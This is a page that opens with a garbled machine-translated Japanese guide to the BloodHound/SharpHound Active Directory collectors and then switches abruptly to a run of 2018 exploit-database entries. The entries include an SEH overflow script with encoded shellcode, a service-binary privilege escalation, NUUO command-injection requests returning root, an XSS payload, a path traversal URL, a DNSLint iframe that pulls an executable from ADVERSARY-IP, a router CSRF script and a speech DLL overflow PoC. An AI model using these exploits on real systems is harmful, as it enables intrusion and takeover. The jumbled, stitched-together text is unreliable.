その他のオプションについては、NetSPIに関するこの素晴らしいブログ投稿を参照してください。これは、PowerShellの実行戦略をバイパスする15の異なる方法を説明しています。
(2).dataコレクション
Bloodhoundインターフェイスを使用して、データ収集を完了します。このインターフェイスは、ZIPファイルをデータとともにアップロードすることと、単一のJSONファイルをサポートします。
Bloodhoundインターフェイスを介してJSONを収集します
2。データコレクター
(1).sharphound -c#gestor
Bloodhoundには、獲得タスクをサポートするためにゼロから書かれた完全なカスタムC#コレクターが含まれるようになりました。コレクター、実行可能ファイル、PowerShellスクリプトを使用する2つのオプションがあります。どちらのコレクターも同じ一連のオプションをサポートしています。 PowerShellバージョンを実行するコマンドはInvoke-Bloodhoundです。すべてのPowerShellスクリプトと同様に、実行ポリシーの制限なしにPowerShell Run環境で実行する必要があります。実行ポリシーのバイパスをバイパスするPowerShellの実行の詳細については、NetsPIによるこのブログ投稿を参照してください。
ロゴや新機能などの詳細については、こちらのブログ投稿をご覧ください。
Bloodhoundを呼び出します
(2)。基本的使用
InvokeBloodhoundは、BackEnd Bloodhoundデータベースを入力するために必要なコレクションオプションを実行します。オプションが指定されていない場合、デフォルトでは、すべての拡張されたグループメンバーシップ情報、すべてのアクセス可能なドメイントラスト情報を収集し、現在のドメインからアクセス可能なすべてのコンピューターのセッション/ローカル管理者データを収集します。すべてのデータは、現在のディレクトリのJSONファイルにエクスポートされます。 * -JSONFOLDER C: \ TEMP*パラメーターは、ファイルが出力されるフォルダーを変更し、
-jsonprefix domainx各出力ファイルの先頭に指定されたフラグを追加します。
ログインドメインのないユーザーセッションデータの場合、デフォルトでは、グローバルカタログを使用して、競合するユーザーの可能なドメインを元に戻そうとします。ユーザーが森の複数のドメインに存在する場合、攻撃パスを変更する可能性は一連の重みで使用されます。このグローバルカタログ競合方式をスキップする場合は、-skipgcdeconfluctionフラグを指定します
(3).collectorオプション
列挙オプション
CollectionMethod-使用するコレクション方法。このパラメーターは、値のコンマ分離されたリストを受け入れます。次のデフォルト値を持っています(デフォルト:デフォルト):デフォルト - 実行グループメンバーシップコレクション、ドメイントラストコレクション、ローカルマネジメントコレクション、およびセッションコレクショングループメンバーシップコレクションローカルグループメンバーコレクションローカル管理者コレクションRDP-実行リモートデスクトップユーザーコレクションPWDLASTSET COMPUTERONLY-実行- ローカル管理者、RDP、DCOM、およびセッションコレクションログドン - 実行特権セッションコレクション(ターゲットシステムで管理者特権が必要) - 信頼ドメイントラスト列挙ACL-コレクションコンテナ - 実行コンテナコレクションDCONLY-RDAPのみを使用してコレクションを実行します。グループ、トラスト、ACL、ObjectProps、コンテナ、GpolocalGroupが含まれます。 GpolocalGroupおよびLoggedon SearchForestを除くすべてのすべての収集方法- 現在のドメインドメイン検索固有のドメインだけでなく、森のすべてのドメインを検索します。 nullの場合、現在のドメイン(デフォルト:null)ステルスを使用して、隠された収集方法を実行します。すべての隠されたオプションはシングルスレッドです。 SKIPGCDECONFLUCTION -SKIPグローバル列挙は、セッション列挙中に競合をキャンセルします。これにより、列挙をスピードアップできますが、データが不正確になる可能性があります。列挙からドメインコントローラーを除外しました(Microsoft ATAフラグを避けます:) ComputerFile ComputerFile ComputerFileは、コンピューター名/IPがロードされるファイルを指定します - 列挙されるOUを指定します
接続オプション
ドメインコントローラーを指定します。通常のLDAPの代わりにセキュアLDAPを使用して広告。デフォルトでは、ポート636に接続します。IngorelDapcert-LDAP SSL証明書を無視します。たとえば、自己署名証明書が存在する場合は、LDAPUSERを使用します。これは、LDAPに接続するために使用されるユーザー名です。 ldappasswordパラメーター(デフォルト:null)ldappass-ユーザーがLDAPに接続するパスワード。また、LDAPUSERパラメーター(デフォルト:null)DisableKerbsIging- LDAP暗号化を無効にすることも必要です。お勧めしません。
パフォーマンスオプション
スレッド - 使用するスレッドの数を指定します(デフォルト:10)PingTimeOut- MillisecondsでのPingリクエストのタイムアウト(デフォルト:250)スキップ - SharphoundはPingリクエストをスキップして、システムがループデレイ数の間にループを開始するかどうかを確認するためにPingリクエストをスキップします。フォーマットは0d0h0m0sです。ヌル値は2時間循環します。 (デフォルト:2H)スロットル - 各リクエストの後にコンピューターへの遅延を追加します。
ミリ秒単位の値(デフォルト:0)ジッター - バルブ値ジッターの割合を増加させます。 (デフォルト:0)
出力オプション
jsonfolder- jsonファイルが保存されているフォルダー(デフォルト:)jsonprefix- jsonファイルに追加するプレフィックス(デフォルト: '")nozip- zipファイルに圧縮しないでください。 zipファイルのランダム出力ファイル名- jsonは、より大きな読み取りのためにjsonを指定します無効化- キャッシュファイルを無効にし、新しいキャッシュ
キャッシュオプション
ステータスインターバル - 列挙中に進行状況が表示される間隔(デフォルト:30000)の詳細- verbose出力
その他のオプション
Sharphound出力は、デフォルトでいくつかのJSONファイルを出力します。 Bloodhoundインターフェイスは、単一のファイルとzipファイルをサポートしています。データをアップロードする最も簡単な方法は、[ノード表示]タブを除くユーザーインターフェイスのどこにでもファイルをドラッグアンドドロップすることです。
3.jsonコレクション
Bloodhound.pyは、インパケットに基づいたPythonベースのBloodhound Collectorです。
Bloodhoundのこのバージョンは、Bloodhound 2.0以降のみと互換性があります。
4。 PythonベースのBloodhound Collector
Bloodhound.pyには現在、次の制限があります。
すべてのBloodhound(Sharphound)機能はまだサポートされていません(サポートされている収集方法については以下を参照) Bloodhound.pは、Impacket、LDAP3、およびDNSPythonモジュールを正常に実行する必要があります
インストールにより、コマンドラインツールBloodhound-Pythonがパスに追加されます。
Bloodhound-Collectorを使用するには、少なくともドメインの資格情報が必要です。このドメインのユーザー名(または信頼できるドメインのユーザーのusername@ドメイン)を使用して-uオプションを指定する必要があります。 DNSが正しく設定され、ADドメインがDNS検索リストにある場合、BloodHound.pyは自動的にドメインを検出します。そうでない場合は、-dオプションを使用して手動で指定する必要があります
デフォルトでは、BloodHound.pyはLDAPとドメインの個々のコンピューターを照会し、ユーザー、コンピューター、グループ、信頼、セッション、ローカル管理者を列挙します。コレクションを制限する場合は、次のオプション(Sharphoundと同様)をサポートする-collectionMethodパラメーターを指定します。
デフォルトローカル管理者コレクションおよびセッションコレクション実行グループメンバーシップコレクション、ドメイントラストコレクション、ローカルマネジメントコレクション、セッションコレクションおよびセッションコレクショングループメンバーシップコレクションローカルアドミン - エクスケーションセッションセッションセッションコレクションACL-解放ACL-解釈ACL-削除- 解釈ドメイン信託排出排出術lastlogonやpwdlastsetなどのプロパティの属性コレクションオールランログドンmulipleコレクションメソッドを除くすべての方法は、たとえば、コンマで分離する必要があります。
特定の自動検出オプションをオーバーライドできます。たとえば、別のドメインコントローラーを使用する場合、-DCを使用してプライマリドメインコントローラーのホスト名を指定するか、-GCを使用して独自のグローバルカタログを指定します。
(1).limitations
1。
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: Splinterware System Scheduler Pro 5.12 - Local Buffer Overflow (SEH)
# Date: 07-21-18
# Vulnerable Software: System Scheduler Pro 5.12
# Vendor Homepage: https://www.splinterware.com
# Version: 5.12
# Software Link: https://www.splinterware.com/download/ssproeval.exe
# Tested Windows 7 SP1 x86
#
#
#
# PoC
# 1. generate sysschedule512.txt, copy contents to clipboard
# 2. open application
# 3. select view, preferences and in the Startup/Logging tab
# 4. paste contents from clipboard to the logfile location field
# 5. exit preferences
# 6. create dummy task to open notepad.exe
# 7. run task, notepad opens
# 8. close notepad
# 9. pop-up window appears and application crashes
import struct
filename="sysschedule512.txt"
junk = "A"*55
#thx giuseppe d'amore for edb-id 28996; edited pop-up msg & encoded
#msfencode -e x86/alpha_mixed -i bzyo; size 287
msg = ("\x89\xe5\xda\xc4\xd9\x75\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59"
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"
"\x75\x4a\x49\x74\x71\x58\x52\x4c\x72\x30\x30\x52\x44\x6c"
"\x4b\x75\x42\x4c\x4b\x62\x72\x34\x4c\x4e\x6b\x30\x52\x45"
"\x4c\x6e\x6b\x73\x72\x56\x68\x6c\x4b\x64\x32\x31\x30\x6c"
"\x4b\x66\x72\x4d\x50\x33\x4e\x66\x6c\x50\x33\x32\x55\x39"
"\x62\x4f\x79\x6a\x67\x43\x33\x62\x58\x67\x4c\x6c\x4b\x56"
"\x37\x33\x48\x66\x61\x4a\x62\x4e\x6b\x51\x6a\x77\x50\x55"
"\x51\x49\x57\x66\x51\x58\x6d\x4e\x6b\x30\x34\x6c\x6f\x76"
"\x61\x69\x56\x57\x35\x4d\x51\x67\x4e\x31\x56\x35\x31\x74"
"\x34\x63\x51\x64\x35\x49\x62\x4f\x71\x43\x4e\x46\x68\x53"
"\x75\x53\x48\x71\x79\x64\x34\x30\x75\x5a\x49\x6c\x4b\x30"
"\x7a\x51\x34\x33\x31\x59\x57\x42\x46\x4c\x4b\x44\x6c\x50"
"\x6f\x4e\x6b\x52\x5a\x45\x4c\x65\x51\x4b\x77\x6e\x6b\x71"
"\x6c\x6e\x4f\x6b\x4c\x55\x51\x38\x47\x51\x78\x37\x51\x75"
"\x71\x37\x51\x76\x61\x65\x38\x71\x52\x61\x4a\x43\x69\x50"
"\x4f\x50\x68\x31\x30\x55\x71\x64\x61\x67\x51\x6d\x59\x48"
"\x61\x6b\x4e\x73\x79\x66\x6b\x44\x71\x6b\x70\x66\x31\x50"
"\x50\x49\x6f\x68\x57\x41\x41")
junk1 = "B"*56
#jmp back to As
jmp3 = "\xe9\x6f\xfe\xff\xff"
junk2= "C"*4
#jmp back after random 8 nulls added
jmp2 = "\xeb\xf5"
junk3 = "C"*10
#jmp back before random 8 nulls added
jmp = "\xeb\xf2\xcc\xcc"
seh = struct.pack('<L',0x00413121)
buffer = junk + msg + junk1 + jmp3 + junk2 + jmp2 + junk3 + jmp + seh
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
# Timeline
#---------------------------------------------------------------------
#05-02-18: Vendor notified of vulnerability
#05-03-18: Initial vendor response
#05-09-18: Issues resolved after some back and forth discussion
#07-20-18: New version released, 5.13, with issue fixed
#07-21-18: Submitted public disclosure
# Exploit Title: Splinterware System Scheduler Pro 5.12 - Privilege Escalation
# Exploit Author: bzyo
# Twitter: @bzyo_
# Date: 2018-07-21
# Vulnerable Software: System Scheduler Pro 5.12
# Vendor Homepage: https://www.splinterware.com
# Version: 5.12
# Tested Windows 7 SP1 x86
# CVE: N/A
# Description:
# Splinterware System Scheduler Pro 5.12 suffers from
# Privilege Escalation due to insecure file permissions
# Prerequisites
# To successfully exploit this vulnerability, the System Scheduler service must already be installed.
# Details
# By default the Everyone group has the modify permission to System Schedule files as shown below.
# With the service installed, a low privilege account is able to rename the WService.exe file located in
# this same path and replace with a malicious file that would connect back to an attacking computer giving system level privileges
# (nt authority\system) due to the service running as Local System. While a low privilege user is unable to restart the service
# through the application, the service is checked periodically triggering the execution of the malicious file.
C:\>icacls "c:\Program Files (x86)\SystemScheduler"
Everyone:(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
C:\>sc qc WindowsScheduler
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WindowsScheduler
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\PROGRA~2\SYSTEM~1\WService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : System Scheduler Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Proof of Concept
1. Login as regular user where Splinterware System Scheduler Pro 5.12 and the service are installed
2. Create malicious .exe with same name 'wservice.exe' that can connect back to attacking machine
3. Download malicious .exe on victim machine, and setup listener on attacking machine
4. Rename original wservice.exe file to wservice.bak, and copy malicious file to location of original
5. wait short amount of time and check attacking machine listener
6. connection back from victim machine successful, run whoami
nt authority\system
# Exploit Title: NUUO NVR Unauthenticated Remote Code Execution
# Exploit Author: Berk Dusunur
# Google Dork: N/A
# Date: 2018-07-21
# Vendor Homepage: http://www.nuuo.com/
# Software Link: http://www.nuuo.com/
# Affected Version: v2016
# Tested on: Parrot OS
# CVE : N/A
# Proof Of Concept
GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27 HTTP/1.1
Host: target:50000
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=7b74657ab949a442c9e440ccf050de1e; lang=en
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.13
Content-type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Sat, 21 Jul 2018 15:54:09 GMT
Server: lighttpd/1.4.39
upload_tmp_dir=/mtd/block3 root
GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;id;%27 HTTP/1.1
Host: target:5000
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=7b74657ab949a442c9e440ccf050de1e; lang=en
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.13
Content-type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Sat, 21 Jul 2018 15:54:09 GMT
Server: lighttpd/1.4.39
upload_tmp_dir=/mtd/block3 uid=0(root) gid=0(root)
# Exploit Title: Kirby CMS 2.5.12 - Cross-Site Scripting
# Date: 2018-07-22
# Exploit Author: Zaran Shaikh
# Version: 2.5.12
# CVE : NA
# Category: Web Application
# Description
# The application allows user injected payload which can lead to Stored
# Cross Site Scripting.
# Proof of Concept
# 1. Visit the application as low priv user
# 2. Go to add page option
# 3. Under title, enter any XSS payload like:
<script>alert("XSS");</script>
# 4. Upon the payload being injected, the subsequent page is triggered
# with XSS
# Exploit Title: Synology DiskStation Manager 4.1 - Directory Traversal
# Google Dork: N/A
# Date: 2018-07-21
# Exploit Author: Berk Dusunur
# Vendor Homepage: https://www.synology.com
# Software Link: https://www.synology.com
# Version: v4.1
# Tested on: Parrot OS
# CVE : N/A
# PoC
http://target:8888/scripts/uistrings.cgi?lang=.////////////////////////////////////////////////////////////////////////////////////////../../../../../etc/synoinfo.conf
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-DNSLINT.EXE-FORCED-DRIVE-BY-DOWNLOAD.txt
[+] ISR: Apparition Security
***Greetz: indoushka | Eduardo***
Vendor
=================
www.microsoft.com
Product
===========
dnslint.exe - DNS Tool
DNSLint is a Microsoft Windows CL utility that helps you to diagnose common DNS name resolution issues.
The utility not installed by default on Windows and must be downloaded from microsoft website.
Vulnerability Type
===================
Forced Drive-by Download
Security Issue
================
The tool doesn't verify domain names when parsing DNS text-files using the "/ql" switch making it prone to forced drive-by
downloads, providing an end user is tricked into using a server text-file containing a script/binary reference instead of
a normally expected domain name.
Normal usage:
(/r flag generates a report)
dnslint.exe /v /y /d somedomain.com /s X.X.X.X /r myreport
Unintended consequence usage:
dnslint.exe /v /y /d "MALWARE-FILE" /s X.X.X.X /r "myreport"
This potentially allows forced downloading of a remote executable to end users host when the report is veiwed in a web browser.
Because the download "seemingly" comes from a "trusted" LOCAL location, an end user may "trust" it and ignore Security warnings
normally associated with opening executables from their browser.
e.g.
The generated report is referenced as Local URI e.g. file:///c:/myreport.html and doesn't visibly point at some remote URL.
Exploit/POC
============
double slashes required "//" to deal with "spaces" or will break injection.
where X.X.X.X is the DNS server IP or use 8.8.8.8 (google DNS), ADVERSARY-IP (attacker IP).
1) "dnslint-update.exe" on remote web server root dir.
2) "servers.txt"
DNSLint
;This is a sample DNSLint input file
+This DNS server is called: dns1.cp.msft.net
[dns~server] X.X.X.X
<iframe//src="http://ADVERSARY-IP/dnslint-update.exe"//style="width:0;height:0;border:0;border:none;"></iframe>,a,r ;A record
X.X.X.X,ptr,r ;PTR record
test1,cname,r ;CNAME record
test2,mx,r ;MX record
3) dnslint.exe /ql servers.txt
BOOOOOOOM Malwarez dropped :)
Optionally, you can point dnslint.exe at a Network share file: \\ADVERSARY-IP\servers.txt
Network Access
===============
Remote
Severity
=========
High 7.6
CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
# Exploit Title: Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)
# Date: 2018-07-21
# Exploit Author: Nathu Nandwani
# Website: http://nandtech.co
# CVE: CVE-2015-5996
#
# Description:
#
# The router is vulnerable to a cross-site request forgery attacker.
# If an administrator is currently logged in and visits a
# remote webpage containing forms existing in the router's firmware,
# a request can be forged to modify existing settings or even
# set the router to its default state.
#
# These are two examples that can work in the proof of concept:
# /goform/SysToolReboot - Reboot the router
# /goform/SysToolRestoreSet - Set the router to default settings
#
# Reference: https://www.kb.cert.org/vuls/id/630872
import socket
server_ip = "0.0.0.0"
server_port = 80
router_ip = "192.168.0.1"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((server_ip, server_port))
sock.listen(1)
print "Currently listening at " + server_ip + ":" + str(server_port)
client, (client_host, client_port) = sock.accept()
print "Client connected: " + client_host + ":" + str(client_port)
print ""
print client.recv(1000)
client.send('HTTP/1.0 200 OK\r\n')
client.send('Content-Type: text/html\r\n')
client.send('\r\n')
client.send("""
<html>
<body>
<form method="post" id="frmSetup" name="frmSetup" action="http://""" + router_ip + """/goform/SysToolReboot">
<input name="CMD" value="SYS_CONF" type="hidden">
<input name="GO" value="system_reboot.asp" type="hidden">
<input name="CCMD" value="0" type="hidden">
</form>
<script>
document.getElementById("frmSetup").submit();
</script>
</body>
</html>
""")
client.close()
sock.close()
# Title: Windows Speech Recognition- Buffer Overflow
# Author: Nassim Asrir
# Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-b73a57122/
# Vendor: https://www.microsoft.com/
About Windows Speech Recognition:
=================================
Windows Speech Recognition lets you control your PC by voice alone, without needing a keyboard or mouse.
Details:
========
If we navigate the Speech directory on Windows 10 we will get some (dll) files but the interest file is (Xtel.dll).
And in the normal case if we say something. that mean as there a variable which register what we say.
And if we play around "Xtel.dll" we will find a function named "Speak" which take to parameter "lineID as Long" and "text as String"
When we inject "A*3092" that lead to Buffer Overflow Vulnerability.
The crash occur in "6344164F MOV ECX,[EAX+2C]"
/* struct s0 {
int8_t[44] pad44;
int32_t f44;
};
void fun_634548b6(int32_t ecx, int32_t a2, int32_t a3, int32_t a4, int32_t a5);
void fun_63441643() {
int32_t ecx1;
struct s0* v2;
int32_t v3;
ecx1 = v2->f44;
fun_634548b6(ecx1, v3, 0, 1, __return_address());
} */
Now we will run our POC.
0:000> g
ModLoad: 74250000 74276000 C:\WINDOWS\SysWOW64\IMM32.DLL
ModLoad: 74d60000 74d6f000 C:\WINDOWS\SysWOW64\kernel.appcore.dll
ModLoad: 71850000 718cc000 C:\WINDOWS\SysWOW64\uxtheme.dll
ModLoad: 6ee90000 6ef16000 C:\WINDOWS\SysWOW64\sxs.dll
ModLoad: 77590000 776d4000 C:\WINDOWS\SysWOW64\MSCTF.dll
ModLoad: 6f720000 6f743000 C:\WINDOWS\SysWOW64\dwmapi.dll
ModLoad: 6bc40000 6bddc000 C:\WINDOWS\SysWOW64\urlmon.dll
ModLoad: 777f0000 77878000 C:\WINDOWS\SysWOW64\shcore.dll
ModLoad: 6cb20000 6cd45000 C:\WINDOWS\SysWOW64\iertutil.dll
ModLoad: 74790000 74d4a000 C:\WINDOWS\SysWOW64\windows.storage.dll
ModLoad: 76f00000 76f45000 C:\WINDOWS\SysWOW64\shlwapi.dll
ModLoad: 776f0000 77708000 C:\WINDOWS\SysWOW64\profapi.dll
ModLoad: 75230000 75275000 C:\WINDOWS\SysWOW64\powrprof.dll
ModLoad: 77730000 77738000 C:\WINDOWS\SysWOW64\FLTLIB.DLL
ModLoad: 74340000 743c3000 C:\WINDOWS\SysWOW64\clbcatq.dll
ModLoad: 63a90000 63ac6000 C:\Windows\SysWOW64\scrobj.dll
ModLoad: 6b730000 6b741000 C:\WINDOWS\SysWOW64\WLDP.DLL
ModLoad: 77200000 77396000 C:\WINDOWS\SysWOW64\CRYPT32.dll
ModLoad: 753a0000 753ae000 C:\WINDOWS\SysWOW64\MSASN1.dll
ModLoad: 751e0000 75227000 C:\WINDOWS\SysWOW64\WINTRUST.dll
ModLoad: 73010000 73023000 C:\WINDOWS\SysWOW64\CRYPTSP.dll
ModLoad: 72fb0000 72fdf000 C:\WINDOWS\SysWOW64\rsaenh.dll
ModLoad: 73820000 73839000 C:\WINDOWS\SysWOW64\bcrypt.dll
ModLoad: 63a80000 63a8a000 C:\Windows\SysWOW64\MSISIP.DLL
ModLoad: 74540000 7459f000 C:\WINDOWS\SysWOW64\coml2.dll
ModLoad: 63a60000 63a78000 C:\Windows\SysWOW64\wshext.dll
ModLoad: 75480000 767ca000 C:\WINDOWS\SysWOW64\SHELL32.dll
ModLoad: 74d70000 74da9000 C:\WINDOWS\SysWOW64\cfgmgr32.dll
ModLoad: 63b00000 63b86000 C:\Windows\SysWOW64\vbscript.dll
ModLoad: 63af0000 63aff000 C:\WINDOWS\SysWOW64\amsi.dll
ModLoad: 73950000 73971000 C:\WINDOWS\SysWOW64\USERENV.dll
ModLoad: 63ad0000 63ae9000 C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1806.18062-0\X86\MpOav.dll
ModLoad: 63440000 63472000 C:\Windows\speech\Xtel.dll
(347c.1e00): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\speech\Xtel.dll -
eax=00000001 ebx=63441643 ecx=63441643 edx=ffffffff esi=02c93664 edi=02c93644
eip=6344164f esp=02afe2b0 ebp=02afe2d8 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
Xtel+0x164f:
6344164f 8b482c mov ecx,dword ptr [eax+2Ch] ds:002b:0000002d=???????? <=====
Now we will try to find our injected "AAA"
0:000> s -a 0x00000000 L?7fffffff "AAAAA"
75db1cad 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cae 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1caf 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cb0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cb1 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cb2 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cb3 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cb4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cb5 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cb6 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cb7 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cb8 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cb9 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cba 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cbb 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cbc 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cbd 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cbe 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cbf 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cc0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cc1 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cc2 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cc3 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cc4 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cc5 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cc6 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cc7 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cc8 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cc9 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
75db1cca 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0:000> k
# ChildEBP RetAddr
00 030fe6a8 753de4ef Xtel+0x164f
01 030fe6c8 753cf69d OLEAUT32!DispCallFunc+0x16f
02 030fe980 634454eb OLEAUT32!CTypeInfo2::Invoke+0x2ed
WARNING: Stack unwind information not available. Following frames may be wrong.
03 030fe9b0 6344a27f Xtel+0x54eb
04 030fe9dc 63b1b6e7 Xtel!DllUnregisterServer+0x502
05 030fea20 63b2832f vbscript!IDispatchInvoke2+0x96
06 030fec6c 63b2fdcc vbscript!InvokeDispatch+0x5ef
07 030fee84 63b29677 vbscript!CScriptRuntime::RunNoEH+0x5bbc
08 030feed4 63b289d5 vbscript!CScriptRuntime::Run+0xc7
09 030fefe4 63b23e93 vbscript!CScriptEntryPoint::Call+0xe5
0a 030ff070 63b25265 vbscript!CSession::Execute+0x443
0b 030ff0bc 63b262c2 vbscript!COleScript::ExecutePendingScripts+0x15a
0c 030ff0e0 63a9c143 vbscript!COleScript::SetScriptState+0x62
0d 030ff10c 63a9cd22 scrobj!ComScriptlet::Inner::StartEngines+0x7c
0e 030ff1f8 63a9b222 scrobj!ComScriptlet::Inner::Init+0x222
0f 030ff20c 63a9b00c scrobj!ComScriptlet::New+0x43
10 030ff230 003de390 scrobj!ComScriptletConstructor::Create+0x3c
11 030ff2b8 003d9693 wscript!CHost::RunXMLScript+0x411
12 030ff508 003dae64 wscript!CHost::Execute+0x284
13 030ffac4 003d8f75 wscript!CHost::Main+0x574
14 030ffd7c 003d9144 wscript!StringCchPrintfA+0xfa9
15 030ffda8 003d7a83 wscript!WinMain+0x1a9
16 030ffdf8 76f68484 wscript!WinMainCRTStartup+0x63
17 030ffe0c 779d2fea KERNEL32!BaseThreadInitThunk+0x24
18 030ffe54 779d2fba ntdll!__RtlUserThreadStart+0x2f
19 030ffe64 00000000 ntdll!_RtlUserThreadStart+0x1b
POC:
===
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:FC9E740F-6058-11D1-8C66-0060081841DE' id='target' />
<script language='vbscript'>
'Wscript.echo typename(target)
'for debugging/custom prolog
vulnerable_DLL = "C:\Windows\speech\Xtel.dll"
prototype = "Sub Speak ( ByVal lineID As Long , ByVal text As String )"
vulnerable_function = "Speak"
progid = "TELLib.phone"
argCount = 2
arg1=1
arg2=String(3092, "AAAAA")
target.Speak arg1 ,arg2
</script></job></package>
#EOF
